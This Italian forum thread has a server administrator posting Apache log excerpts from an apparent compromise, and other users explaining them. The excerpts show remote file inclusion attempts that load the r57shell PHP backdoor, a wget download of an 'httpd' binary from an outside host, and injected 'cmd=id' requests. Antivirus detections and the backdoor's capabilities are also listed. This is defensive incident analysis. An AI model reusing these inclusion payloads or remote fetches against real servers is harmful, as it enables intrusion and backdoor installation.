[APACHE] Server violato ?

[JRizz]

Sembra che il mio server sia stato violato a causa di un baco su una pagina index.php di uno sei siti ospitati.

Qualcuno sa dirmi cosa vogliono dire queste righe del file log?
===========
error_log

sh: line 1: sysctl: command not found
sh: line 1: sysctl: command not found
mkdir: .x: Numerical result out of range
sh: line 1: cd: .x: No such file or directory
[Sun Sep 03 12:17:10 2006] [error] [client 82.49.79.35] File does not
exist: /home/web/www.avabvv.it/website/images/bg.gif, referer:
http://www.avabvv.it/main.php?PAGE=h.../r57shell.txt?
sh: line 1: sysctl: command not found
sh: line 1: sysctl: command not found
sh: line 1: cd: /var/tmp/.x: No such file or directory
--12:17:40-- http://gh0stcrew.altervista.org/httpd
=> `httpd'
Resolving gh0stcrew.altervista.org... done.
Connecting to gh0stcrew.altervista.org[207.44.186.19]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219,325 [text/plain]
httpd: Permission denied

Cannot write to `httpd' (Permission denied).



access_log

82.59.203.174 - - [03/Sep/2006:18:56:11 +0200] "GET /index.php?
ass=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 20
0 3100 "-" "-"
82.59.203.174 - - [03/Sep/2006:18:56:11 +0200] "GET /index.php?
ass=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 20
0 3100
=======

Grazie

[marketto]

ciao,
ti sposto su sicurezza.

[Habanero]

sinceramente non so interpretare in dettaglio... comunque...

-qualcosa cerca di lanciare il comando sysctl ma l'operazione non va a buon fine perchè il comando sembra non essere presente sul server. sysctl serve tra l'altro a configurare a runtime alcuni parametri del kernel...

-si cerca di creare una cartella ma l'operazione non va a buon fine. Ovviamente non va a buon fine neanche il successivo tentativo di entrarvi.

-si fa una richiesta http sfruttando il sito avabvv.it? (è il tuo sito? è down). In particolare si cerca di sfruttare una vulnerabilità per l'inclusione di un file esterno nella pagina. Si cerca di includere, sfruttando la pagina main.php, una pagina php presente all'indirizzo httx://rst.void.ru/download/r57shell.txt?. Non sono stato ad interpretare il codice php in essa contenuto ma visto l'origine russa del sito non mi faccio illusioni sul suo contenuto. Sinceramente non so darti informazioni sull'esito delll'operazione... temo sia andata a buon fine ma non garantisco.

-sembra esserci una non meglio definita richiesta a httx://gh0stcrew.altervista.org/httpd. httpd sembra essere un esguibile ELF....

-Per finire i due accessi dell'access_log richiamano la pagina index.php del sito in cui il parametro ass della queystring riferisce un motore di ricerca brasiliano...

[LUCASS]

File: r57shell.txt
Status:
INFECTED/MALWARE
MD5 ef40e65b6a9cf30c56c8c8678d038bbb
AntiVir
PHP/RSTBackdoor
ArcaVir
Trojan.Php.Rst.H
Fortinet
PHP/Rst.H!tr.bdr
Kaspersky Anti-Virus
Backdoor.PHP.Rst.h
NOD32
HTML/Rst.H
Symantec
PHP.RSTBackdoor
McAfee
BackDoor-CUS!php
Ewido
Backdoor.Rst.h

Troj/RSTDoor-A is a backdoor Trojan for Unix based platforms running PHP and HTTPD.
The Trojan accepts commands via HTTP request strings and allows remote attackers the ability to access and control the infected computer. Troj/RSTDoor-A also allows web based interface to control the backdoor functionality.
Troj/RSTDoor-A carries additional Perl and C source files that can be compiled or interpreted on command.
The Trojan can be instructed by remote attackers to perform various tasks, including:
- collect information from the infected computer, such as database servers, directory structures, files and permissions, etc.
- open a remote shell (BASH)
- upload/download arbitrary files
- execute arbitrary files
- scan for vulnerabilities
- change file attributes (owner, permissions)
- run arbitrary SQL commands
- send email
- start and FTP server
http://www.sophos.com/security/analy...jrstdoora.html
http://www.symantec.com/security_res...217-99&tabid=2

Il sito http://gh0stcrew.altervista.org/ sembra essere un normale sito ,è gestito da italiani,probabilmente vista la natura del sito,volevano scaricare qualche file uplodato li????? :master: ,l'altro sito invece è pieno di exploit

[JRizz]

Grazie a tutti e due è proprio quel che pensavo.
Il sito non è mio ma ho visto che vi è stato installato una specie di CMS che scrive su file di testo.